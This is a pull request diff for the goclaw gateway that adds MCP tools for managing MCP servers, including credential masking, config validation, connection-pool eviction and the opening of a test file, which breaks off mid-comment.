### PR TITLE
feat(mcp): expose MCP server management as goclaw_mcp_servers_* tools

### DIFF
--- a/cmd/gateway.go
+++ b/cmd/gateway.go
@@ -578,6 +578,12 @@ func runGateway() {
 	var mediaStore *media.Store
 	var postTurn tools.PostTurnProcessor
 	contextFileInterceptor, mcpPool, mediaStore, postTurn = wireExtras(pgStores, agentRouter, providerRegistry, modelReg, msgBus, pgStores.Sessions, toolsReg, toolPE, skillsLoader, hasMemory, traceCollector, workspace, cfg.Gateway.InjectionAction, cfg, sandboxMgr, redisClient, domainBus, usageCapSvc, mcpOAuthRefresher)
+	// Wired after wireExtras because the pool is created there: the CRUD MCP
+	// server's goclaw_mcp_servers_* tools evict pooled connections when a
+	// server's credentials or URL change.
+	if pgStores != nil && pgStores.MCP != nil {
+		server.SetMCPServerDeps(pgStores.MCP, mcpMgr, mcpPool, mcpOAuthRefresher)
+	}
 	if mcpPool != nil {
 		defer mcpPool.Stop()
 	}

--- a/internal/gateway/server.go
+++ b/internal/gateway/server.go
@@ -86,6 +86,14 @@ type Server struct {
 	systemCfgStore   store.SystemConfigStore
 	secureCLIStore   store.SecureCLIStore
 
+	// MCP-server self-management for the CRUD MCP server's goclaw_mcp_servers_*
+	// tools. mcpServerStore alone enables them; the manager/pool/OAuth provider
+	// refine live tool listing, pool eviction and OAuth-backed discovery.
+	mcpServerStore store.MCPServerStore
+	mcpManager     *mcpbridge.Manager
+	mcpPool        *mcpbridge.Pool
+	mcpOAuth       mcpbridge.OAuthTokenProvider
+
 	// Phase 3 CRUD MCP server (/api/mcp/) dependencies: chat/LLM/logs/send/voices.
 	llmProviders      *providers.Registry
 	llmDefaults       mcpbridge.LLMDefaults
@@ -333,6 +341,10 @@ func (s *Server) BuildMux() *http.ServeMux {
 			Activity:          s.activityStore,
 			SystemConfigs:     s.systemCfgStore,
 			SecureCLI:         s.secureCLIStore,
+			MCPServers:        s.mcpServerStore,
+			MCPManager:        s.mcpManager,
+			MCPPool:           s.mcpPool,
+			MCPOAuth:          s.mcpOAuth,
 		}, s.version)
 		mux.Handle("/api/mcp/", mcpServerTokenAuthMiddleware(s.cfg.Gateway.MCPServerToken, crudHandler))
 	} else {
@@ -920,6 +932,23 @@ func (s *Server) SetSystemConfigStore(sc store.SystemConfigStore) { s.systemCfgS
 // CRUD MCP server (see internal/mcp/crud_server.go) to expose
 // goclaw_secure_cli_binaries_* tools.
 func (s *Server) SetSecureCLIStore(sc store.SecureCLIStore) { s.secureCLIStore = sc }
+
+// SetMCPServerDeps sets the MCP-server management dependencies, used by the
+// CRUD MCP server (see internal/mcp/crud_mcp_servers.go) to expose
+// goclaw_mcp_servers_* tools. Only servers is required; manager, pool and
+// oauth may each be nil, and the tools degrade accordingly rather than being
+// withheld — see mcpServerCRUDDeps.
+func (s *Server) SetMCPServerDeps(
+	servers store.MCPServerStore,
+	manager *mcpbridge.Manager,
+	pool *mcpbridge.Pool,
+	oauth mcpbridge.OAuthTokenProvider,
+) {
+	s.mcpServerStore = servers
+	s.mcpManager = manager
+	s.mcpPool = pool
+	s.mcpOAuth = oauth
+}
 
 // SetExecApprovalManager sets the exec approval manager, used by the CRUD MCP
 // server (see internal/mcp/crud_server.go) to expose exec approval tools.

--- a/internal/mcp/crud_mcp_servers.go
+++ b/internal/mcp/crud_mcp_servers.go
@@ -1,0 +1,698 @@
+package mcp
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"log/slog"
+	"regexp"
+
+	"github.com/google/uuid"
+
+	mcpgo "github.com/mark3labs/mcp-go/mcp"
+	mcpserver "github.com/mark3labs/mcp-go/server"
+
+	"github.com/nextlevelbuilder/goclaw/internal/bus"
+	"github.com/nextlevelbuilder/goclaw/internal/store"
+	"github.com/nextlevelbuilder/goclaw/pkg/protocol"
+)
+
+// mcpServerCRUDDeps bundles what the goclaw_mcp_servers_* tools need. Only
+// Servers is required; the rest degrade gracefully (see each handler).
+type mcpServerCRUDDeps struct {
+	Servers store.MCPServerStore
+	// Manager, when set, lets goclaw_mcp_servers_tools return the tool set of
+	// an already-connected server without a fresh handshake.
+	Manager *Manager
+	// Pool, when set, is evicted on reconnect and on credential-affecting
+	// updates so the next call reconnects with the new configuration.
+	Pool *Pool
+	// OAuth, when set, supplies Bearer tokens for discovery against
+	// OAuth-protected servers. When nil, such servers are never discovered
+	// with their static headers — see handleMCPServersTools.
+	OAuth OAuthTokenProvider
+	// MessageBus, when set, broadcasts the same cache-invalidate event the
+	// REST handlers emit, so live agents pick up server changes.
+	MessageBus *bus.MessageBus
+}
+
+// mcpServerNameRe mirrors internal/http's slugRe: MCP server names become tool
+// name prefixes, so the same character restriction applies here. Duplicated
+// rather than imported because internal/http already imports this package.
+var mcpServerNameRe = regexp.MustCompile(`^[a-z0-9]([a-z0-9-]*[a-z0-9])?$`)
+
+// mcpServerUpdatableFields mirrors internal/http's mcpServerAllowedFields —
+// the allowlist of columns an update may touch. Same defense-in-depth intent:
+// an unknown key is dropped rather than reaching the store.
+var mcpServerUpdatableFields = map[string]bool{
+	"name": true, "display_name": true, "transport": true, "command": true,
+	"args": true, "url": true, "api_key": true, "env": true, "headers": true,
+	"enabled": true, "tool_prefix": true, "timeout_sec": true,
+	"require_user_credentials": true, "settings": true,
+}
+
+// registerMCPServerCRUDTools registers the goclaw_mcp_servers_* MCP tools,
+// closing the gap that made MCP-server management the one admin surface
+// reachable only over REST (/v1/mcp/servers): an agent could mint an API key
+// with goclaw_api_keys_create but then had to leave MCP to register a server.
+func registerMCPServerCRUDTools(srv *mcpserver.MCPServer, deps mcpServerCRUDDeps) {
+	srv.AddTool(mcpgo.NewTool("goclaw_mcp_servers_list",
+		mcpgo.WithDescription("List configured MCP servers with their agent grant counts. Credentials (api_key, header and env values) are masked."),
+		mcpgo.WithReadOnlyHintAnnotation(true),
+	), handleMCPServersList(deps))
+
+	srv.AddTool(mcpgo.NewTool("goclaw_mcp_servers_get",
+		mcpgo.WithDescription("Get a single MCP server by UUID or name. Credentials are masked."),
+		mcpgo.WithString("id", mcpgo.Description("Server UUID.")),
+		mcpgo.WithString("name", mcpgo.Description("Server name, used when id is not known.")),
+		mcpgo.WithReadOnlyHintAnnotation(true),
+	), handleMCPServersGet(deps))
+
+	srv.AddTool(mcpgo.NewTool("goclaw_mcp_servers_create",
+		mcpgo.WithDescription("Register a new MCP server. Use transport \"stdio\" with command+args, or \"http\"/\"sse\" with url. Credentials are stored encrypted and never echoed back."),
+		mcpgo.WithString("name", mcpgo.Required(), mcpgo.Description("Server name: lowercase alphanumerics and dashes; becomes the tool name prefix.")),
+		mcpgo.WithString("transport", mcpgo.Required(), mcpgo.Description("Transport: \"stdio\", \"http\", \"streamable-http\" or \"sse\".")),
+		mcpgo.WithString("display_name", mcpgo.Description("Human-readable display name; defaults to name.")),
+		mcpgo.WithString("command", mcpgo.Description("Executable to run (stdio transport only).")),
+		mcpgo.WithArray("args", mcpgo.Description("Arguments passed to command (stdio transport only)."), mcpgo.WithStringItems()),
+		mcpgo.WithString("url", mcpgo.Description("Server URL (http/sse transports only).")),
+		mcpgo.WithObject("headers", mcpgo.Description("HTTP headers sent on every request, as a string→string object.")),
+		mcpgo.WithObject("env", mcpgo.Description("Environment variables for the child process, as a string→string object.")),
+		mcpgo.WithString("api_key", mcpgo.Description("API key sent as the Authorization bearer token; stored encrypted.")),
+		mcpgo.WithString("tool_prefix", mcpgo.Description("Prefix prepended to this server's tool names; defaults to name.")),
+		mcpgo.WithNumber("timeout_sec", mcpgo.Description("Per-call timeout in seconds.")),
+		mcpgo.WithBoolean("enabled", mcpgo.Description("Enabled state; defaults to true.")),
+		mcpgo.WithBoolean("require_user_credentials", mcpgo.Description("Mint credentials per user at message time instead of sharing one admin key.")),
+		mcpgo.WithObject("settings", mcpgo.Description("Extra settings blob (e.g. an \"oauth\" block).")),
+	), handleMCPServersCreate(deps))
+
+	srv.AddTool(mcpgo.NewTool("goclaw_mcp_servers_update",
+		mcpgo.WithDescription("Apply a partial update to an MCP server. Changing url, credentials or the oauth settings evicts pooled connections so the next call reconnects."),
+		mcpgo.WithString("id", mcpgo.Required(), mcpgo.Description("Server UUID.")),
+		mcpgo.WithString("name", mcpgo.Description("New name: lowercase alphanumerics and dashes.")),
+		mcpgo.WithString("display_name", mcpgo.Description("New display name.")),
+		mcpgo.WithString("transport", mcpgo.Description("New transport.")),
+		mcpgo.WithString("command", mcpgo.Description("New command (stdio transport only).")),
+		mcpgo.WithArray("args", mcpgo.Description("New argument list (stdio transport only)."), mcpgo.WithStringItems()),
+		mcpgo.WithString("url", mcpgo.Description("New server URL (http/sse transports only).")),
+		mcpgo.WithObject("headers", mcpgo.Description("Replacement HTTP headers object.")),
+		mcpgo.WithObject("env", mcpgo.Description("Replacement environment object.")),
+		mcpgo.WithString("api_key", mcpgo.Description("New API key; stored encrypted.")),
+		mcpgo.WithString("tool_prefix", mcpgo.Description("New tool name prefix.")),
+		mcpgo.WithNumber("timeout_sec", mcpgo.Description("New per-call timeout in seconds.")),
+		mcpgo.WithBoolean("enabled", mcpgo.Description("New enabled state.")),
+		mcpgo.WithBoolean("require_user_credentials", mcpgo.Description("New per-user credential requirement.")),
+		mcpgo.WithObject("settings", mcpgo.Description("Replacement settings blob.")),
+	), handleMCPServersUpdate(deps))
+
+	srv.AddTool(mcpgo.NewTool("goclaw_mcp_servers_delete",
+		mcpgo.WithDescription("Delete an MCP server by UUID, along with its grants."),
+		mcpgo.WithString("id", mcpgo.Required(), mcpgo.Description("Server UUID.")),
+		mcpgo.WithDestructiveHintAnnotation(true),
+	), handleMCPServersDelete(deps))
+
+	srv.AddTool(mcpgo.NewTool("goclaw_mcp_servers_tools",
+		mcpgo.WithDescription("List the tools a configured MCP server exposes, from the live connection when available and by on-demand discovery otherwise."),
+		mcpgo.WithString("id", mcpgo.Required(), mcpgo.Description("Server UUID.")),
+		mcpgo.WithReadOnlyHintAnnotation(true),
+	), handleMCPServersTools(deps))
+
+	srv.AddTool(mcpgo.NewTool("goclaw_mcp_servers_test",
+		mcpgo.WithDescription("Test an MCP server configuration by connecting and counting its tools, without saving anything. Pass server_id to test a stored server's OAuth credentials."),
+		mcpgo.WithString("transport", mcpgo.Required(), mcpgo.Description("Transport: \"stdio\", \"http\", \"streamable-http\" or \"sse\".")),
+		mcpgo.WithString("server_id", mcpgo.Description("UUID of a stored server, so an OAuth token is used instead of the supplied headers.")),
+		mcpgo.WithString("command", mcpgo.Description("Executable to run (stdio transport only).")),
+		mcpgo.WithArray("args", mcpgo.Description("Arguments passed to command (stdio transport only)."), mcpgo.WithStringItems()),
+		mcpgo.WithString("url", mcpgo.Description("Server URL (http/sse transports only).")),
+		mcpgo.WithObject("headers", mcpgo.Description("HTTP headers to test with, as a string→string object.")),
+		mcpgo.WithObject("env", mcpgo.Description("Environment variables to test with, as a string→string object.")),
+		mcpgo.WithReadOnlyHintAnnotation(true),
+	), handleMCPServersTest(deps))
+
+	srv.AddTool(mcpgo.NewTool("goclaw_mcp_servers_reconnect",
+		mcpgo.WithDescription("Drop the pooled connection to an MCP server so the next call reconnects with its current configuration."),
+		mcpgo.WithString("id", mcpgo.Required(), mcpgo.Description("Server UUID.")),
+	), handleMCPServersReconnect(deps))
+}
+
+// maskedSecret replaces every credential value leaving this surface. The CRUD
+// MCP server is gated by one shared full-trust token, but an MCP tool result is
+// fed straight into an LLM context (and its transcript), which is not a place
+// raw API keys or Authorization headers should ever land. Matches
+// maskProviderAPIKey's reasoning for goclaw_providers_*.
+const maskedSecret = "***"
+
+// maskMCPServerSecrets blanks api_key and every header/env value in place,
+// keeping the keys so a caller can still see which are set.
+func maskMCPServerSecrets(srv *store.MCPServerData) {
+	if srv.APIKey != "" {
+		srv.APIKey = maskedSecret
+	}
+	srv.Headers = maskJSONObjectValues(srv.Headers)
+	srv.Env = maskJSONObjectValues(srv.Env)
+}
+
+// maskJSONObjectValues rewrites a JSONB string→string object so every value
+// becomes maskedSecret. A blob that is absent or not a string map is returned
+// unchanged: it holds no credential this function knows how to mask, and
+// dropping it would silently hide configuration from the caller.
+func maskJSONObjectValues(raw json.RawMessage) json.RawMessage {
+	if len(raw) == 0 {
+		return raw
+	}
+	var obj map[string]string
+	if err := json.Unmarshal(raw, &obj); err != nil {
+		return raw
+	}
+	for key := range obj {
+		obj[key] = maskedSecret
+	}
+	masked, err := json.Marshal(obj)
+	if err != nil {
+		return raw
+	}
+	return masked
+}
+
+// emitMCPCacheInvalidate mirrors MCPHandler.emitCacheInvalidate so a server
+// changed over MCP invalidates the same caches a REST change would. Without
+// it, running agents keep serving the previous tool set until they restart.
+func (deps mcpServerCRUDDeps) emitMCPCacheInvalidate() {
+	if deps.MessageBus == nil {
+		return
+	}
+	deps.MessageBus.Broadcast(bus.Event{
+		Name:    protocol.EventCacheInvalidate,
+		Payload: bus.CacheInvalidatePayload{Kind: bus.CacheKindMCP},
+	})
+}
+
+// mcpServerWithGrantCount is the list-tool shape: the stored server plus how
+// many agents hold a grant on it, matching GET /v1/mcp/servers.
+type mcpServerWithGrantCount struct {
+	store.MCPServerData
+	AgentCount int `json:"agent_count"`
+}
+
+func handleMCPServersList(deps mcpServerCRUDDeps) mcpserver.ToolHandlerFunc {
+	return func(ctx context.Context, _ mcpgo.CallToolRequest) (*mcpgo.CallToolResult, error) {
+		servers, err := deps.Servers.ListServers(ctx)
+		if err != nil {
+			return toolError("mcp_servers.list", err)
+		}
+		// A counts failure degrades to zeroes rather than failing the listing:
+		// the grant count is decoration, the server list is the answer.
+		counts, err := deps.Servers.CountAgentGrantsByServer(ctx)
+		if err != nil {
+			slog.Warn("mcp_servers.list.count_grants_failed", "error", err)
+			counts = map[uuid.UUID]int{}
+		}
+		result := make([]mcpServerWithGrantCount, len(servers))
+		for i := range servers {
+			maskMCPServerSecrets(&servers[i])
+			result[i] = mcpServerWithGrantCount{
+				MCPServerData: servers[i],
+				AgentCount:    counts[servers[i].ID],
+			}
+		}
+		return jsonToolResult(map[string]any{"servers": result})
+	}
+}
+
+func handleMCPServersGet(deps mcpServerCRUDDeps) mcpserver.ToolHandlerFunc {
+	return func(ctx context.Context, req mcpgo.CallToolRequest) (*mcpgo.CallToolResult, error) {
+		srv, err := lookupMCPServer(ctx, deps.Servers, req.GetString("id", ""), req.GetString("name", ""))
+		if err != nil {
+			return toolError("mcp_servers.get", err)
+		}
+		if srv == nil {
+			return mcpgo.NewToolResultError("mcp_servers.get: one of id or name is required"), nil
+		}
+		maskMCPServerSecrets(srv)
+		return jsonToolResult(srv)
+	}
+}
+
+// lookupMCPServer resolves a server by UUID or by name. A (nil, nil) result
+// means neither identifier was supplied — the caller reports that, since it is
+// a malformed request rather than a lookup failure.
+func lookupMCPServer(ctx context.Context, servers store.MCPServerStore, idStr, name string) (*store.MCPServerData, error) {
+	switch {
+	case idStr != "":
+		id, err := uuid.Parse(idStr)
+		if err != nil {
+			return nil, fmt.Errorf("invalid id: %w", err)
+		}
+		srv, err := servers.GetServer(ctx, id)
+		if err != nil {
+			return nil, fmt.Errorf("get server %s: %w", id, err)
+		}
+		return srv, nil
+	case name != "":
+		srv, err := servers.GetServerByName(ctx, name)
+		if err != nil {
+			return nil, fmt.Errorf("get server %q: %w", name, err)
+		}
+		return srv, nil
+	default:
+		return nil, nil
+	}
+}
+
+func handleMCPServersCreate(deps mcpServerCRUDDeps) mcpserver.ToolHandlerFunc {
+	return func(ctx context.Context, req mcpgo.CallToolRequest) (*mcpgo.CallToolResult, error) {
+		name, err := req.RequireString("name")
+		if err != nil {
+			return toolError("mcp_servers.create", err)
+		}
+		transport, err := req.RequireString("transport")
+		if err != nil {
+			return toolError("mcp_servers.create", err)
+		}
+		if !mcpServerNameRe.MatchString(name) {
+			return mcpgo.NewToolResultError("mcp_servers.create: name must be lowercase alphanumerics and dashes"), nil
+		}
+
+		args := stringSliceArg(req, "args")
+		command := req.GetString("command", "")
+		url := req.GetString("url", "")
+		// Same guard the REST handler applies: reject shell metacharacters,
+		// non-allowlisted commands and private-network URLs before storing a
+		// config the bridge would later execute or dial.
+		if err := ValidateServerConfig(transport, command, args, url); err != nil {
+			slog.Warn("security.mcp.server_rejected", "source", "mcp_crud", "reason", err.Error(), "transport", transport)
+			return toolError("mcp_servers.create", err)
+		}
+
+		srv := &store.MCPServerData{
+			Name:                   name,
+			DisplayName:            req.GetString("display_name", name),
+			Transport:              transport,
+			Command:                command,
+			URL:                    url,
+			APIKey:                 req.GetString("api_key", ""),
+			ToolPrefix:             req.GetString("tool_prefix", ""),
+			TimeoutSec:             req.GetInt("timeout_sec", 0),
+			Enabled:                req.GetBool("enabled", true),
+			RequireUserCredentials: req.GetBool("require_user_credentials", false),
+			CreatedBy:              "mcp_crud",
+		}
+		for _, field := range []struct {
+			key    string
+			target *json.RawMessage
+		}{
+			{"args", &srv.Args},
+			{"headers", &srv.Headers},
+			{"env", &srv.Env},
+			{"settings", &srv.Settings},
+		} {
+			raw, err := rawJSONArg(req, field.key)
+			if err != nil {
+				return toolError("mcp_servers.create", err)
+			}
+			*field.target = raw
+		}
+
+		if err := deps.Servers.CreateServer(ctx, srv); err != nil {
+			return toolError("mcp_servers.create", fmt.Errorf("create server %q: %w", name, err))
+		}
+		deps.emitMCPCacheInvalidate()
+		// Mask a copy: srv is the struct the store just took ownership of, and
+		// an in-place mask would overwrite the credentials it holds.
+		response := *srv
+		maskMCPServerSecrets(&response)
+		return jsonToolResult(&response)
+	}
+}
+
+// stringSliceArg reads an array-of-strings argument, ignoring any non-string
+// element. Mirrors the REST update handler's tolerant []any walk.
+func stringSliceArg(req mcpgo.CallToolRequest, key string) []string {
+	raw, ok := req.GetArguments()[key]
+	if !ok {
+		return nil
+	}
+	items, ok := raw.([]any)
+	if !ok {
+		return nil
+	}
+	out := make([]string, 0, len(items))
+	for _, item := range items {
+		if str, ok := item.(string); ok {
+			out = append(out, str)
+		}
+	}
+	return out
+}
+
+// rawJSONArg re-marshals a structured argument into the JSONB shape the store
+// expects. An absent argument yields nil so the column keeps its default.
+func rawJSONArg(req mcpgo.CallToolRequest, key string) (json.RawMessage, error) {
+	value, ok := req.GetArguments()[key]
+	if !ok || value == nil {
+		return nil, nil
+	}
+	raw, err := json.Marshal(value)
+	if err != nil {
+		return nil, fmt.Errorf("encode %s: %w", key, err)
+	}
+	return raw, nil
+}
+
+func handleMCPServersUpdate(deps mcpServerCRUDDeps) mcpserver.ToolHandlerFunc {
+	return func(ctx context.Context, req mcpgo.CallToolRequest) (*mcpgo.CallToolResult, error) {
+		idStr, err := req.RequireString("id")
+		if err != nil {
+			return toolError("mcp_servers.update", err)
+		}
+		id, err := uuid.Parse(idStr)
+		if err != nil {
+			return toolError("mcp_servers.update", fmt.Errorf("invalid id: %w", err))
+		}
+
+		updates := map[string]any{}
+		for key, value := range req.GetArguments() {
+			if mcpServerUpdatableFields[key] {
+				updates[key] = value
+			}
+		}
+		if len(updates) == 0 {
+			return mcpgo.NewToolResultError("mcp_servers.update: no fields to update"), nil
+		}
+		if name, ok := updates["name"].(string); ok && !mcpServerNameRe.MatchString(name) {
+			return mcpgo.NewToolResultError("mcp_servers.update: name must be lowercase alphanumerics and dashes"), nil
+		}
+
+		existing, err := deps.Servers.GetServer(ctx, id)
+		if err != nil {
+			return toolError("mcp_servers.update", fmt.Errorf("get server %s: %w", id, err))
+		}
+		// Validate the merged config, not just the changed fields: switching
+		// transport without clearing command (or vice versa) is only visible
+		// against the stored row.
+		if err := ValidateServerConfig(
+			stringUpdateOr(updates, "transport", existing.Transport),
+			stringUpdateOr(updates, "command", existing.Command),
+			mergedArgs(updates, existing),
+			stringUpdateOr(updates, "url", existing.URL),
+		); err != nil {
+			slog.Warn("security.mcp.server_update_rejected", "source", "mcp_crud", "server_id", id, "reason", err.Error())
+			return toolError("mcp_servers.update", err)
+		}
+
+		if err := deps.Servers.UpdateServer(ctx, id, updates); err != nil {
+			return toolError("mcp_servers.update", fmt.Errorf("update server %s: %w", id, err))
+		}
+
+		// Anything that changes how the bridge authenticates or where it
+		// connects must drop pooled connections, or the old credentials keep
+		// being replayed until the process restarts. EvictServer covers the
+		// shared connection and every per-user one, since per-user connections
+		// inherit the server-level headers/api_key as their base.
+		evicted := false
+		if deps.Pool != nil && existing.Name != "" && credentialAffectingUpdate(updates) {
+			deps.Pool.EvictServer(store.TenantIDFromContext(ctx), existing.Name)
+			evicted = true
+		}
+		deps.emitMCPCacheInvalidate()
+
+		updated, err := deps.Servers.GetServer(ctx, id)
+		if err != nil {
+			return toolError("mcp_servers.update", fmt.Errorf("get updated server %s: %w", id, err))
+		}
+		maskMCPServerSecrets(updated)
+		return jsonToolResult(map[string]any{"server": updated, "pool_evicted": evicted})
+	}
+}
+
+// credentialAffectingUpdate reports whether an update changes where the bridge
+// connects or how it authenticates, and therefore invalidates pooled
+// connections.
+func credentialAffectingUpdate(updates map[string]any) bool {
+	for _, key := range []string{"url", "api_key", "headers", "env", "settings", "transport", "command", "args"} {
+		if _, ok := updates[key]; ok {
+			return true
+		}
+	}
+	return false
+}
+
+// stringUpdateOr returns the updated string value for key, or the stored value
+// when the update does not touch it.
+func stringUpdateOr(updates map[string]any, key, current string) string {
+	if value, ok := updates[key].(string); ok {
+		return value
+	}
+	return current
+}
+
+// mergedArgs returns the argument list an update would leave in place: the new
+// one when supplied, the stored one otherwise.
+func mergedArgs(updates map[string]any, existing *store.MCPServerData) []string {
+	if raw, ok := updates["args"]; ok {
+		items, ok := raw.([]any)
+		if !ok {
+			return nil
+		}
+		out := make([]string, 0, len(items))
+		for _, item := range items {
+			if str, ok := item.(string); ok {
+				out = append(out, str)
+			}
+		}
+		return out
+	}
+	var args []string
+	if len(existing.Args) > 0 {
+		if err := json.Unmarshal(existing.Args, &args); err != nil {
+			slog.Warn("mcp_servers.update.args_decode_failed", "server_id", existing.ID, "error", err)
+			return nil
+		}
+	}
+	return args
+}
+
+func handleMCPServersDelete(deps mcpServerCRUDDeps) mcpserver.ToolHandlerFunc {
+	return func(ctx context.Context, req mcpgo.CallToolRequest) (*mcpgo.CallToolResult, error) {
+		idStr, err := req.RequireString("id")
+		if err != nil {
+			return toolError("mcp_servers.delete", err)
+		}
+		id, err := uuid.Parse(idStr)
+		if err != nil {
+			return toolError("mcp_servers.delete", fmt.Errorf("invalid id: %w", err))
+		}
+		// Read the name first: after deletion there is nothing left to derive
+		// the pool key from, and a surviving pooled connection would keep
+		// serving a server the operator just removed.
+		var name string
+		if existing, err := deps.Servers.GetServer(ctx, id); err == nil && existing != nil {
+			name = existing.Name
+		}
+		if err := deps.Servers.DeleteServer(ctx, id); err != nil {
+			return toolError("mcp_servers.delete", fmt.Errorf("delete server %s: %w", id, err))
+		}
+		if deps.Pool != nil && name != "" {
+			deps.Pool.EvictServer(store.TenantIDFromContext(ctx), name)
+		}
+		deps.emitMCPCacheInvalidate()
+		return jsonToolResult(map[string]bool{"deleted": true})
+	}
+}
+
+func handleMCPServersTools(deps mcpServerCRUDDeps) mcpserver.ToolHandlerFunc {
+	return func(ctx context.Context, req mcpgo.CallToolRequest) (*mcpgo.CallToolResult, error) {
+		idStr, err := req.RequireString("id")
+		if err != nil {
+			return toolError("mcp_servers.tools", err)
+		}
+		id, err := uuid.Parse(idStr)
+		if err != nil {
+			return toolError("mcp_servers.tools", fmt.Errorf("invalid id: %w", err))
+		}
+		srv, err := deps.Servers.GetServer(ctx, id)
+		if err != nil {
+			return toolError("mcp_servers.tools", fmt.Errorf("get server %s: %w", id, err))
+		}
+
+		// Prefer the live connection: it yields the bare tool names and real
+		// descriptions without a second handshake, and matches the shape
+		// DiscoverTools returns so grants saved from either source match.
+		var tools []ToolInfo
+		if deps.Manager != nil {
+			tools = deps.Manager.ServerToolInfos(srv.Name)
+		}
+
+		authorizationRequired := false
+		if len(tools) == 0 && srv.Transport != "" {
+			discovered, needsAuth, err := discoverServerTools(ctx, deps, srv)
+			switch {
+			case needsAuth:
+				authorizationRequired = true
+			case err != nil:
+				return toolError("mcp_servers.tools", err)
+			default:
+				tools = discovered
+			}
+		}
+
+		if tools == nil {
+			tools = []ToolInfo{}
+		}
+		return jsonToolResult(map[string]any{
+			"tools":                  tools,
+			"authorization_required": authorizationRequired,
+		})
+	}
+}
+
+// discoverServerTools performs an on-demand handshake against a stored server.
+// The second return value reports that the server uses OAuth and no valid token
+// is available: discovery is then skipped rather than retried with the static
+// headers, because those headers are not what the server actually accepts and
+// listing tools the caller cannot invoke is worse than listing none.
+func discoverServerTools(ctx context.Context, deps mcpServerCRUDDeps, srv *store.MCPServerData) ([]ToolInfo, bool, error) {
+	var args []string
+	var env, headers map[string]string
+	// A malformed column is worth reporting but not worth failing on: the
+	// remaining fields still describe a connectable server.
+	for _, field := range []struct {
+		name   string
+		raw    json.RawMessage
+		target any
+	}{
+		{"args", srv.Args, &args},
+		{"env", srv.Env, &env},
+		{"headers", srv.Headers, &headers},
+	} {
+		if len(field.raw) == 0 {
+			continue
+		}
+		if err := json.Unmarshal(field.raw, field.target); err != nil {
+			slog.Warn("mcp_servers.tools.decode_failed", "server", srv.Name, "field", field.name, "error", err)
+		}
+	}
+
+	if IsOAuthActive(srv.Settings) {
+		token := ""
+		if deps.OAuth != nil {
+			// Discovery is server-wide, so use the global token — the tool set
+			// does not vary per user even when credentials do.
+			token, _ = deps.OAuth.GetValidToken(ctx, srv.ID, store.TenantIDFromContext(ctx), "")
+		}
+		if token == "" {
+			return nil, true, nil
+		}
+		if headers == nil {
+			headers = make(map[string]string)
+		}
+		headers["Authorization"] = "Bearer " + token
+	}
+
+	tools, err := DiscoverTools(ctx, srv.Transport, srv.Command, args, env, srv.URL, headers)
+	if err != nil {
+		return nil, false, fmt.Errorf("discover tools for %q: %w", srv.Name, err)
+	}
+	return tools, false, nil
+}
+
+func handleMCPServersTest(deps mcpServerCRUDDeps) mcpserver.ToolHandlerFunc {
+	return func(ctx context.Context, req mcpgo.CallToolRequest) (*mcpgo.CallToolResult, error) {
+		transport, err := req.RequireString("transport")
+		if err != nil {
+			return toolError("mcp_servers.test", err)
+		}
+		command := req.GetString("command", "")
+		url := req.GetString("url", "")
+		args := stringSliceArg(req, "args")
+		headers := stringMapArg(req, "headers")
+		env := stringMapArg(req, "env")
+
+		// A rejected config is a test result, not a tool failure — the caller
+		// asked whether this configuration works, and the answer is no.
+		if err := ValidateServerConfig(transport, command, args, url); err != nil {
+			return jsonToolResult(map[string]any{"success": false, "error": err.Error()})
+		}
+
+		// For a stored OAuth server, authorization comes solely from its OAuth
+		// token: a caller-supplied Authorization header would test credentials
+		// the bridge will never actually use.
+		if serverID := req.GetString("server_id", ""); serverID != "" && deps.Servers != nil {
+			id, err := uuid.Parse(serverID)
+			if err != nil {
+				return toolError("mcp_servers.test", fmt.Errorf("invalid server_id: %w", err))
+			}
+			srv, err := deps.Servers.GetServer(ctx, id)
+			if err != nil {
+				return toolError("mcp_servers.test", fmt.Errorf("get server %s: %w", id, err))
+			}
+			if IsOAuthActive(srv.Settings) {
+				delete(headers, "Authorization")
+				if deps.OAuth != nil {
+					token, err := deps.OAuth.GetValidToken(ctx, id, store.TenantIDFromContext(ctx), "")
+					if err != nil {
+						return jsonToolResult(map[string]any{"success": false, "error": "oauth token unavailable: " + err.Error()})
+					}
+					if token != "" {
+						if headers == nil {
+							headers = make(map[string]string)
+						}
+						headers["Authorization"] = "Bearer " + token
+					}
+				}
+			}
+		}
+
+		tools, err := DiscoverTools(ctx, transport, command, args, env, url, headers)
+		if err != nil {
+			return jsonToolResult(map[string]any{"success": false, "error": err.Error()})
+		}
+		return jsonToolResult(map[string]any{"success": true, "tool_count": len(tools)})
+	}
+}
+
+// stringMapArg reads a string→string object argument, skipping non-string
+// values rather than failing the call.
+func stringMapArg(req mcpgo.CallToolRequest, key string) map[string]string {
+	raw, ok := req.GetArguments()[key]
+	if !ok {
+		return nil
+	}
+	obj, ok := raw.(map[string]any)
+	if !ok {
+		return nil
+	}
+	out := make(map[string]string, len(obj))
+	for name, value := range obj {
+		if str, ok := value.(string); ok {
+			out[name] = str
+		}
+	}
+	return out
+}
+
+func handleMCPServersReconnect(deps mcpServerCRUDDeps) mcpserver.ToolHandlerFunc {
+	return func(ctx context.Context, req mcpgo.CallToolRequest) (*mcpgo.CallToolResult, error) {
+		idStr, err := req.RequireString("id")
+		if err != nil {
+			return toolError("mcp_servers.reconnect", err)
+		}
+		id, err := uuid.Parse(idStr)
+		if err != nil {
+			return toolError("mcp_servers.reconnect", fmt.Errorf("invalid id: %w", err))
+		}
+		srv, err := deps.Servers.GetServer(ctx, id)
+		if err != nil {
+			return toolError("mcp_servers.reconnect", fmt.Errorf("get server %s: %w", id, err))
+		}
+		if deps.Pool == nil {
+			// Without a pool there is nothing cached to drop, so the next call
+			// already reconnects. Say so instead of reporting a no-op as done.
+			return jsonToolResult(map[string]any{"status": "no_pool", "server": srv.Name})
+		}
+		deps.Pool.Evict(store.TenantIDFromContext(ctx), srv.Name)
+		deps.emitMCPCacheInvalidate()
+		slog.Info("mcp.server.reconnect_requested", "source", "mcp_crud", "server", srv.Name, "id", id)
+		return jsonToolResult(map[string]any{"status": "reconnected", "server": srv.Name})
+	}
+}

--- a/internal/mcp/crud_mcp_servers_test.go
+++ b/internal/mcp/crud_mcp_servers_test.go
@@ -1,0 +1,394 @@
+package mcp
+
+import (
+	"context"
+	"encoding/json"
+	"strings"
+	"testing"
+
+	"github.com/google/uuid"
+
+	mcpserver "github.com/mark3labs/mcp-go/server"
+
+	"github.com/nextlevelbuilder/goclaw/internal/store"
+)
+
+// fakeMCPServerCRUDStore is an in-memory store.MCPServerStore for the
+// goclaw_mcp_servers_* tools. It embeds mockMCPStore (grant_checker_test.go)
+// for the interface methods these tests don't exercise, and overrides the
